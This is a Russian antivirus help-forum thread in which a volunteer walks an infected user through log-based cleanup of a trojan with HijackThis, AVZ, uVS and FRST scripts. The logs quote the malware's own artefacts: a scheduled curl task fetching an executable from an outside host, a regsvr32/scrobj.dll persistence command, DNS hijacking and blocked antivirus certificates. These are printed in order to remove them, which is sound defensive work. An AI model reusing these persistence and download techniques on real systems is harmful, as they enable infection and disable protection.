Процесс с расширением tpm.exe [HEUR:Trojan.Win32.Generic ]

Printable View

06.02.2018, 12:36
noob4321

Вложений: 1

Процесс с расширением tpm.exe [HEUR:Trojan.Win32.Generic ]

При загрузке компьютера в папке Temp появляется файл начинающийся на g, а окончания названия всегда случайное.Также он создаёт процесс с расширением temp.exe.
06.02.2018, 12:37
Info_bot

Уважаемый(ая) [B]noob4321[/B], спасибо за обращение на наш форум!

Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
06.02.2018, 22:16
Vvvyg

Запустите HijackThis, расположенный в папке Autologger и [url="http://virusinfo.info/showthread.php?t=4491"]пофиксите[/url] (в [B]Windows Vista/7/8/10[/B] необходимо запускать через правую кнопку мыши [B]Запуск от имени администратора)[/B]):[code]R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Search Bar] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIPcoSf2TGNKmBMhWGXvqWwz3Nn-w1WgOgibISP9XojZSAHEWNVWWj7YGSyjV87AgP4gmu5y2Xdm1fxfR4am47aeRULFivg-lD2eeDnQr3ar02haLWPNBlL_zG-RzDTwoubbdmH_NawHRWoF648kNvNoCQsTyEgvHs5keJqY
R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Search Page] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIPcoSf2TGNKmBMhWGXvqWwz3Nn-w1WgOgibISP9XojZSAHEWNVWWj7YGSyjV87AgP4gmu5y2Xdm1fxfR4am47aeRULFivg-lD2eeDnQr3ar02haLWPNBlL_zG-RzDTwoubbdmH_NawHRWoF648kNvNoCQsTyEgvHs5keJqY
R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Start Page] = https://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIPcoSf2TGNKmBMhWGXvqWwz3Nn-w1WgOgibISP9XojZSAHEWNVWWj7YGSyjV87AgP4gmu5y2Xdm1fxfR4am47aeRUL3AyD1m5EKtCVbbeR3Ygw4ax8HiiptH7G5AYxBxEA3i8y_3j0FcZeqXSoeuz1OD5WnjDmw4g3qNieVAHhXIVAORILlF
R0 - HKCU\Software\Microsoft\Internet Explorer\Search: [Default_Search_URL] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIPcoSf2TGNKmBMhWGXvqWwz3Nn-w1WgOgibISP9XojZSAHEWNVWWj7YGSyjV87AgP4gmu5y2Xdm1fxfR4am47aeRULFivg-lD2eeDnQr3ar02haLWPNBlL_zG-RzDTwoubbdmH_NawHRWoF648kNvNoCQsTyEgvHs5keJqY
R1 - HKCU\Software\Microsoft\Internet Explorer\Main: [SearchAssistant] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIPcoSf2TGNKmBMhWGXvqWwz3Nn-w1WgOgibISP9XojZSAHEWNVWWj7YGSyjV87AgP4gmu5y2Xdm1fxfR4am47aeRULFivg-lD2eeDnQr3ar02haLWPNBlL_zG-RzDTwoubbdmH_NawHRWoF648kNvNoCQsTyEgvHs5keJqYvsUFgYGsVf8Kk&q={searchTerms}
4 - HKLM\..\RunOnce: [NEKIT-PC] = C:\Windows\TEMP\g11CC.tmp.exe
O4 - MSConfig\startupreg: GoogleChromeAutoLaunch_1B1C65155E77809584296B047C81E09D [command] = C:\Users\nekit\AppData\Local\Yandex\YandexBrowser\Application\browser.exe --no-startup-window /prefetch:5 (HKCU) (2017/07/12)
O4 - User Startup: C:\Users\nekit\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hinata.lnk -> C:\Windows\SysWOW64\regsvr32.exe /u /n /s /i:C:\Users\nekit\AppData\Roaming\persit.sct scrobj.dll
O7 - Policy: [Untrusted Certificate] 03D22C9C66915D58C88912B64C1F984B8344EF09 - Comodo Security Solutions, Inc
O7 - Policy: [Untrusted Certificate] 0F684EC1163281085C6AF20528878103ACEFCAAB - F-Secure Corporation
O7 - Policy: [Untrusted Certificate] 1667908C9E22EFBD0590E088715CC74BE4C60884 - FRISK Software International
O7 - Policy: [Untrusted Certificate] 18DEA4EFA93B06AE997D234411F3FD72A677EECE - Bitdefender SRL
O7 - Policy: [Untrusted Certificate] 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF - G DATA Software AG
O7 - Policy: [Untrusted Certificate] 249BDA38A611CD746A132FA2AF995A2D3C941264 - Malwarebytes Corporation
O7 - Policy: [Untrusted Certificate] 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF - Symantec Corporation
O7 - Policy: [Untrusted Certificate] 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 - Trend Micro, Inc.
O7 - Policy: [Untrusted Certificate] 3353EA609334A9F23A701B9159E30CB6C22D4C59 - Webroot Inc.
O7 - Policy: [Untrusted Certificate] 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A - SUPERAntiSpyware.com
O7 - Policy: [Untrusted Certificate] 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F - Kaspersky Lab
O7 - Policy: [Untrusted Certificate] 3D496FA682E65FC122351EC29B55AB94F3BB03FC - AVG Technologies CZ, s.r.o.
O7 - Policy: [Untrusted Certificate] 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 - PC Tools
O7 - Policy: [Untrusted Certificate] 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 - K7 Computing Pvt Ltd
O7 - Policy: [Untrusted Certificate] 4420C99742DF11DD0795BC15B7B0ABF090DC84DF - Doctor Web Ltd.
O7 - Policy: [Untrusted Certificate] 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF - Emsisoft Ltd
O7 - Policy: [Untrusted Certificate] 5240AB5B05D11B37900AC7712A3C6AE42F377C8C - Check Point Software Technologies Ltd.
O7 - Policy: [Untrusted Certificate] 5DD3D41810F28B2A13E9A004E6412061E28FA48D - Emsisoft Ltd
O7 - Policy: [Untrusted Certificate] 7457A3793086DBB58B3858D6476889E3311E550E - K7 Computing Pvt Ltd
O7 - Policy: [Untrusted Certificate] 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 - BullGuard Ltd
O7 - Policy: [Untrusted Certificate] 775B373B33B9D15B58BC02B184704332B97C3CAF - McAfee, Inc.
O7 - Policy: [Untrusted Certificate] 872CD334B7E7B3C3D1C6114CD6B221026D505EAB - Comodo Security Solutions, Inc.
O7 - Policy: [Untrusted Certificate] 88AD5DFE24126872B33175D1778687B642323ACF - McAfee, Inc.
O7 - Policy: [Untrusted Certificate] 9132E8B079D080E01D52631690BE18EBC2347C1E - Adaware Software
O7 - Policy: [Untrusted Certificate] 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 - Safer Networking Ltd.
O7 - Policy: [Untrusted Certificate] 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 - Webroot Inc.
O7 - Policy: [Untrusted Certificate] 9C43F665E690AB4D486D4717B456C5554D4BCEB5 - ThreatTrack Security, Inc.
O7 - Policy: [Untrusted Certificate] 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 - CURIOLAB S.M.B.A.
O7 - Policy: [Untrusted Certificate] A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 - Avira Operations GmbH & Co. KG
O7 - Policy: [Untrusted Certificate] A5341949ABE1407DD7BF7DFE75460D9608FBC309 - BullGuard Ltd.
O7 - Policy: [Untrusted Certificate] A59CC32724DD07A6FC33F7806945481A2D13CA2F - ESET, spol. s r.o.
O7 - Policy: [Untrusted Certificate] AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 - AVG Technologies CZ, s.r.o.
O7 - Policy: [Untrusted Certificate] AD4C5429E10F4FF6C01840C20ABA344D7401209F - AVAST Software s.r.o.
O7 - Policy: [Untrusted Certificate] AD96BB64BA36379D2E354660780C2067B81DA2E0 - Symantec Corporation
O7 - Policy: [Untrusted Certificate] B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 - Malwarebytes Corporation
O7 - Policy: [Untrusted Certificate] CDC37C22FE9272D8F2610206AD397A45040326B8 - Trend Micro, Inc.
O7 - Policy: [Untrusted Certificate] D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 - Kaspersky Lab
O7 - Policy: [Untrusted Certificate] DB303C9B61282DE525DC754A535CA2D6A9BD3D87 - ThreatTrack Security, Inc.
O7 - Policy: [Untrusted Certificate] DB77E5CFEC34459146748B667C97B185619251BA - AVAST Software s.r.o.
O7 - Policy: [Untrusted Certificate] E22240E837B52E691C71DF248F12D27F96441C00 - Total Defense, Inc.
O7 - Policy: [Untrusted Certificate] E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF - AVG Technologies CZ, s.r.o.
O7 - Policy: [Untrusted Certificate] ED841A61C0F76025598421BC1B00E24189E68D54 - Bitdefender SRL
O7 - Policy: [Untrusted Certificate] F83099622B4A9F72CB5081F742164AD1B8D048C9 - ESET, spol. s r.o.
O7 - Policy: [Untrusted Certificate] FBB42F089AF2D570F2BF6F493D107A3255A9BB1A - Panda Security S.L
O7 - Policy: [Untrusted Certificate] FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 - Doctor Web Ltd.
O7 - Policy: [Untrusted Certificate] Fix all items from the log
O17 - HKLM\System\CCS\Services\Tcpip\..\{0E7C49D1-3E3F-4D64-A4D4-22C9127DE602}: [NameServer] = 82.163.142.178
O17 - HKLM\System\CCS\Services\Tcpip\..\{0E7C49D1-3E3F-4D64-A4D4-22C9127DE602}: [NameServer] = 82.163.143.176
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: [NameServer] = 82.163.142.178
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: [NameServer] = 82.163.143.176
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{0E7C49D1-3E3F-4D64-A4D4-22C9127DE602}: [NameServer] = 82.163.142.178
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{0E7C49D1-3E3F-4D64-A4D4-22C9127DE602}: [NameServer] = 82.163.143.176
O17 - HKLM\System\ControlSet002\Services\Tcpip\Parameters: [NameServer] = 82.163.142.178
O17 - HKLM\System\ControlSet002\Services\Tcpip\Parameters: [NameServer] = 82.163.143.176
O22 - Task (Job): ReimageUpdater.job - C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe run_task
O22 - Task: Guard - C:\Program Files (x86)\System Native\Main Services\Guard.exe (file missing)
O22 - Task: MSI - C:\Users\nekit\AppData\Roaming\Microsoft\msi.exe cnt=2 fts="Downloads\feyk-stim___.exe" (file missing)
O22 - Task: curl - C:\Users\nekit\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\nekit\AppData\Roaming\curl\curl.exe" (file missing)
O22 - Task: curls - C:\Users\nekit\AppData\Roaming\curl\curl.exe (file missing)
O23 - Service S2: Icon Codec Service Apllication - (Icon Codec Service) - C:\Users\nekit\AppData\Local\Temp\4C6D.tmp.exe (file missing) -service[/code][url="http://virusinfo.info/showthread.php?t=7239"]Выполните скрипт в AVZ[/url]:[code]begin
TerminateProcessByName('C:\Windows\Temp\g11CD.tmp.exe');
QuarantineFile('C:\Users\nekit\AppData\Roaming\curl\curl.exe', '');
QuarantineFile('C:\Users\nekit\AppData\Roaming\curl\curl_7_54.exe', '');
QuarantineFile('C:\Users\nekit\AppData\Roaming\Microsoft\msi.exe', '');
QuarantineFile('C:\Windows\microsoft\svchost.exe', '');
QuarantineFile('C:\Windows\TEMP\g11CC.tmp.exe', '');
QuarantineFile('C:\Windows\Temp\g11CD.tmp.exe', '');
QuarantineFileF('C:\Windows\Temp', '*.tmp.exe', false, '', 0, 0);
DeleteFile('C:\Program Files\Reimage\Reimage', '32');
DeleteFile('C:\Users\nekit\AppData\Roaming\curl\curl.exe', '32');
DeleteFile('C:\Users\nekit\AppData\Roaming\curl\curl_7_54.exe', '32');
DeleteFile('C:\Users\nekit\AppData\Roaming\Microsoft\msi.exe', '32');
DeleteFile('C:\Windows\microsoft\svchost.exe', '32');
DeleteFile('C:\Windows\TEMP\g11CC.tmp.exe', '32');
DeleteFile('C:\Windows\Temp\g11CD.tmp.exe', '32');
DeleteFile('http:\amtomil.ru\f.exe', '32');
DeleteFile('ReimageUpdater.job', '64');
ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true);
DeleteFileMask('c:\program files\reimage', '*', true);
DeleteFileMask('c:\users\nekit\appdata\roaming\curl', '*', true);
DeleteFileMask('C:\Windows\Temp', '*.tmp.exe', true);
DeleteDirectory('c:\program files\reimage');
DeleteDirectory('c:\users\nekit\appdata\roaming\curl');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\RunOnce', 'NEKIT-PC');
CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
ExecuteRepair(2);
ExecuteRepair(3);
ExecuteRepair(4);
ExecuteWizard('SCU', 2, 2, true);
RebootWindows(true);
end.[/code]Компьютер перезагрузится.

В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

Устраняйте уязвимость, которую используют в т. ч. нашумевшие шифровальщики WannaCry и Petya, критический патч - по ссылке отсюда: [url]http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212[/url]

Скачайте утилиту Universal Virus Sniffer [URL="https://yadi.sk/d/6A65LkI1WEuqC"]отсюда[/URL] и [url=http://virusinfo.info/showthread.php?t=121767]сделайте полный образ автозапуска uVS[/url].
07.02.2018, 08:44
noob4321

Всё сделано.Файл в карантин отправил, утилиту скачал образ автозапуска сделал, единственное только при установке патч он выдал ошибка что на этот компьютер установится не может
07.02.2018, 21:18
Vvvyg

[QUOTE=noob4321;1475000]утилиту скачал образ автозапуска сделал[/QUOTE]
И где он? Если не влезает во вложения - загрузите в доступное облачное хранилище или на файлообменник (rghost.ru, например) и дайте ссылку.
08.02.2018, 15:54
noob4321

Вложений: 1

вот образ
08.02.2018, 23:35
Vvvyg

Скопируйте скрипт ниже в буфер обмена (выделить и нажать Ctrl-C):[code];uVS v4.0.10 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
OFFSGNSAVE
zoo %SystemDrive%\PROGRAM FILES\FREE MP3 TURBASHPACK\FREE MP3 TURBASHPACK.DLL
addsgn BA6F9BD21DE149A710CAAE329EC9D505258AFCF6FDF057FB418B2C0DAE298EDC6F9E877306DCC96D1FC80DD3623EA167E7DFE89AED79B02C61FCE00BFF8D7657 48 TR/Wdfload.xurqu [Avira] 7

zoo %SystemRoot%\TEMP\G343A.TMP.EXE
addsgn BA6F9BB2BDE54A720B9C2D754C2164FBDA75303AC9A957FB69E38D315559AE4F235F488E76DC9CBFE981F095FC0E49FA7D37EA8AAA25F8A7EE3F27EBE75DE1BF 15 Trojan.BtcMine.2104 [DrWeb] 7

zoo %SystemRoot%\TEMP\G1812.TMP.EXE
addsgn BA6F9BB2BDFD4B720B9C2D754C2164FBDA75303AC9A957FB69E38D3789E5B8B336FC2B573E1D1682D4955E774616B6EF9937E8721D5178962473A4EF8F85E653 8 TR/Wdfload.vxodr [Avira] 7

chklst
delvir

deldir %SystemDrive%\PROGRAM FILES\FREE MP3 TURBASHPACK
delref %SystemDrive%\PROGRAMDATA\{0D3D5C13-612C-1}\{0D3D5C13-612C-1}.D
delref %SystemDrive%\PROGRAMDATA\{1FCD217D-012C-0}\{1FCD217D-012C-0}.D
delref %SystemDrive%\PROGRAMDATA\{32292181-712C-0}\{32292181-712C-0}.D
apply
deltmp
czoo
restart[/code]
Запустите файл start.exe из папки с uVS, выберите "Запустить под текущим пользователем", в главном меню программы - Скрипты -> выполнить скрипт из буфера обмена.
Компьютер перезагрузится.

В папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.

Загрузите, распакуйте на Рабочий стол и запустите [URL="https://yadi.sk/d/xIUtpEqJq4wru"]SecurityCheck by glax24 & Severnyj[/URL].
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши [B]Запуск от имени администратора[/B] (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например [I]C:\SecurityCheck\SecurityCheck.txt[/I].

Приложите этот файл к своему следующему сообщению.
09.02.2018, 13:50
noob4321

Вложений: 2

вот лог uVS

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]

вот лог SecurityCheck
09.02.2018, 22:20
Vvvyg

[QUOTE]HotFix KB3115858 [color=red][b]Внимание! [url=https://technet.microsoft.com/en-us/library/security/ms16-013.aspx]Скачать обновления[/url][/b][/color]
HotFix KB3140735 [color=red][b]Внимание! [url=https://technet.microsoft.com/en-us/library/security/ms16-026.aspx]Скачать обновления[/url][/b][/color]
HotFix KB3138910 [color=red][b]Внимание! [url=https://technet.microsoft.com/en-us/library/security/ms16-027.aspx]Скачать обновления[/url][/b][/color]
HotFix KB3138962 [color=red][b]Внимание! [url=https://technet.microsoft.com/en-us/library/security/ms16-027.aspx]Скачать обновления[/url][/b][/color]
HotFix KB3145739 [color=red][b]Внимание! [url=https://technet.microsoft.com/en-us/library/security/ms16-039.aspx]Скачать обновления[/url][/b][/color]
HotFix KB3146963 [color=red][b]Внимание! [url=https://technet.microsoft.com/en-us/library/security/ms16-040.aspx]Скачать обновления[/url][/b][/color]
HotFix KB3156013 [color=red][b]Внимание! [url=https://technet.microsoft.com/en-us/library/security/ms16-055.aspx]Скачать обновления[/url][/b][/color]
HotFix KB3156016 [color=red][b]Внимание! [url=https://technet.microsoft.com/en-us/library/security/ms16-055.aspx]Скачать обновления[/url][/b][/color]
HotFix KB3156019 [color=red][b]Внимание! [url=https://technet.microsoft.com/en-us/library/security/ms16-055.aspx]Скачать обновления[/url][/b][/color]
HotFix KB3155178 [color=red][b]Внимание! [url=https://technet.microsoft.com/en-us/library/security/ms16-056.aspx]Скачать обновления[/url][/b][/color]
HotFix KB3153171 [color=red][b]Внимание! [url=https://technet.microsoft.com/en-us/library/security/ms16-061.aspx]Скачать обновления[/url][/b][/color]
HotFix KB3170455 [color=red][b]Внимание! [url=https://technet.microsoft.com/en-us/library/security/ms16-087.aspx]Скачать обновления[/url][/b][/color]
HotFix KB3178034 [color=red][b]Внимание! [url=https://technet.microsoft.com/en-us/library/security/ms16-097.aspx]Скачать обновления[/url][/b][/color]
HotFix KB3185911 [color=red][b]Внимание! [url=https://technet.microsoft.com/en-us/library/security/ms16-106.aspx]Скачать обновления[/url][/b][/color]
HotFix KB3184122 [color=red][b]Внимание! [url=https://technet.microsoft.com/en-us/library/security/ms16-116.aspx]Скачать обновления[/url][/b][/color]
HotFix KB3192391 [color=red][b]Внимание! [url=https://technet.microsoft.com/en-us/library/security/ms16-122.aspx]Скачать обновления[/url][/b][/color]
HotFix KB3197867 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3197867]Скачать обновления[/url][/b][/color]
HotFix KB3205394 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB3205394]Скачать обновления[/url][/b][/color]
HotFix KB4012212 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212]Скачать обновления[/url][/b][/color]
HotFix KB4019263 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4019263]Скачать обновления[/url][/b][/color]
HotFix KB4022722 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4022722]Скачать обновления[/url][/b][/color]
HotFix KB4015546 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4015546]Скачать обновления[/url][/b][/color]
HotFix KB4025337 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4025337]Скачать обновления[/url][/b][/color]
HotFix KB4034679 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4034679]Скачать обновления[/url][/b][/color]
HotFix KB4041678 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4041678]Скачать обновления[/url][/b][/color]
HotFix KB4056894 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4056894]Скачать обновления[/url][/b][/color]
HotFix KB4056897 [color=red][b]Внимание! [url=https://www.catalog.update.microsoft.com/Search.aspx?q=KB4056897]Скачать обновления[/url][/b][/color][/QUOTE]Эти критические патчи установите обязательно, иначе лечиться можно до бесконечности.

[QUOTE]GRIZZLY Antivirus (включен и устарел)[/QUOTE]Удалите это недоразумение.

Скачайте [URL="http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/"]Farbar Recovery Scan Tool[/URL] и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
11.02.2018, 14:37
noob4321

Вложений: 2

патчи установил, проверку сделал.Процесс вроде пропал
11.02.2018, 15:05
Vvvyg

Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:[CODE]CreateRestorePoint:
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ATTENTION
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ATTENTION
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ATTENTION
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ATTENTION
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ATTENTION
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== ATTENTION
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ATTENTION
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ATTENTION
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
GroupPolicy: Restriction - Windows Defender <==== ATTENTION
GroupPolicy\User: Restriction <==== ATTENTION
2017-12-27 17:44 - 2017-12-27 17:44 - 000000037 ___SH () C:\Users\nekit\AppData\Local\20986331705021ca58edc424.96250074
2018-01-14 10:13 - 2018-01-14 10:13 - 007563264 _____ () C:\Users\nekit\AppData\Local\agent.dat
2018-01-14 10:13 - 2018-01-14 10:13 - 000070800 _____ () C:\Users\nekit\AppData\Local\Config.xml
2018-01-14 09:58 - 2018-01-14 09:58 - 000140800 _____ () C:\Users\nekit\AppData\Local\installer.dat
2018-01-14 10:13 - 2018-01-14 10:13 - 001980097 _____ () C:\Users\nekit\AppData\Local\Keyplus.tst
2018-01-14 10:13 - 2018-01-14 10:13 - 000005568 _____ () C:\Users\nekit\AppData\Local\md.xml
